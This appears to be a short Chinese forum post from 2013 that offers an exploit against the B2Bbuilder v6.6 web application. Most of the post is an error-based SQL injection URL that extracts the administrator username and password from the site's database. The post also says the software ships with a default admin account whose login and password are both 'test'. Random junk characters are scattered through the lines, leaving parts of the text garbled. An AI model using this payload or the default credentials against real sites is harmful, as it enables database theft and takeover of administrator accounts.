测试的程序版本为:B2Bbuilder_v6.6: |5 p# ]# F! R" A# D8 W7 M2 j9 r
7 z& F9 W/ U! ?: g: Q7 J- y# `, Y 8 c. N* W8 E$ i( h
http://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%28
4 l5 O7 w( Z% }4 p8 ^4 j: H/ Fselect+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password
6 t" n$ l) _4 l7 s( k Q, r%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1
& `' L! Q& `! h2 q& ~3 @4 Y. I%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29
7 \4 F7 g7 H% p( M4 k*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1/ l" ^: e0 j3 ^0 D) y
, q3 V7 a2 J, O# i: J6 g& P这个B2B程序还有一个默认的管理员帐号,帐号密码都是test
$ p$ B8 Y( h% t4 \: h
7 w6 Y. [. T1 W' X, ?0 @ |
发表于 2013-7-26 12:44:48
收藏
支持
反对